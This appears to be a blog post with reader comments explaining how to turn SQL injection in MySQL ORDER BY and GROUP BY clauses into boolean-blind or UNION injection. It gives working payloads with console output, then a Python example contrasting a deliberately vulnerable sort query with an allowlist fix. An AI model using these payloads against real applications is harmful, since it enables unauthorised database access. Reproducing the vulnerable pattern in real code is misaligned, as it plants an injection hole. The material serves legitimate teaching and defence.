Exploiting SQL injection when the input lands in the ORDER BY clause is a bit tricky, since UNION queries are not permitted after ORDER BY. The following can be used in such a scenario to turn it into a blind (boolean) SQL injection: the CASE expression evaluates the nested subquery only when the condition is false, and because that subquery returns more than one row the whole query fails, so a true condition yields a normal result and a false one yields an error.
mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+------+
| id   |
+------+
|    1 |
+------+
1 row in set (0.00 sec)
----
mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
----
For injections where the user's input goes into the GROUP BY clause, UNION queries can be used, although the technique above also works for blind injection:
mysql> select id from news where id =1 group by id union select 2222;
+------+
| id   |
+------+
|    1 |
| 2222 |
+------+
2 rows in set (0.00 sec)
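The reason ORDER BY and GROUP BY are injectable in the first place is that a column name cannot be passed as a bind parameter, so application code tends to splice the user's sort choice straight into the SQL text. The following is an added example (not code from the original post) showing that vulnerable pattern next to the usual fix: map the user's sort key and direction through a fixed allowlist, and bind everything else as a parameter. It assumes a small news table built in-memory with sqlite3 (constructed data, not the poster's database); the point carries over unchanged to MySQL.

```python
import sqlite3


def make_db():
    # Constructed sample schema and rows, loosely modelled on the post's 'news' table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", [
        (1, "first", "2009-01-01"),
        (2, "second", "2009-02-01"),
        (3, "third", "2009-03-01"),
    ])
    return conn


def vulnerable_list(conn, sort_expr):
    # ORDER BY cannot take a bound column name, so the tempting shortcut is
    # string interpolation. Whatever the caller passes is parsed as SQL,
    # which is exactly the injection point the post describes.
    sql = f"SELECT id FROM news WHERE id > 0 ORDER BY {sort_expr}"
    return [row[0] for row in conn.execute(sql)]


# Allowlist: the only strings that may ever reach the ORDER BY clause.
# Keys are what the client is allowed to send; values are the real SQL identifiers.
ALLOWED_SORT_COLUMNS = {"id": "id", "title": "title", "date": "published"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def safe_list(conn, sort_key, direction="asc", min_id=0):
    # Look the client values up in the allowlist; anything unknown is rejected
    # outright instead of being forwarded to the database.
    try:
        column = ALLOWED_SORT_COLUMNS[sort_key]
        order = ALLOWED_DIRECTIONS[direction.lower()]
    except KeyError:
        raise ValueError(f"unsupported sort parameter: {sort_key!r} {direction!r}")
    # Only allowlisted identifiers are interpolated; data values are still bound.
    sql = f"SELECT id FROM news WHERE id > ? ORDER BY {column} {order}"
    return [row[0] for row in conn.execute(sql, (min_id,))]


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_list(db, "id DESC"))      # raw text is executed as SQL
    print(safe_list(db, "date", "desc"))       # client key mapped to a real column
    try:
        safe_list(db, "id, (select 1)")         # rejected before reaching the database
    except ValueError as exc:
        print("rejected:", exc)
```

Rejecting unknown keys (rather than trying to escape them) is the important design choice: there is no quoting rule for identifiers that is safe across databases, and a closed mapping also hides the real column names from the client. A failed lookup here is also a useful signal to log, since legitimate clients only ever send keys from the allowlist.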
6 Comments
Great. That's exactly what I was searching for.
Not so great: I do not understand what the example should do…
what version of the mysql are you trying this?
I think this does not work in some of the recent versions.
Server Version: 5.1.30
I meant especially the “order by”-case.
What happens is exactly the shown reaction. What does that error tell me (regarding the injection)?
This is how you can convert this into standard true and false responses. Think of that error as a 'false' response which you get when doing boolean injection;
e.g. id=100 and 1=1; id=100 and 1=2;
----
of course -.-'
Thank you.
THANKS MAN!!!
I tried to figure this out for about 2 days, cuz IF(1=1,1,1) did not work, but this ROCKS.
Thanks Again!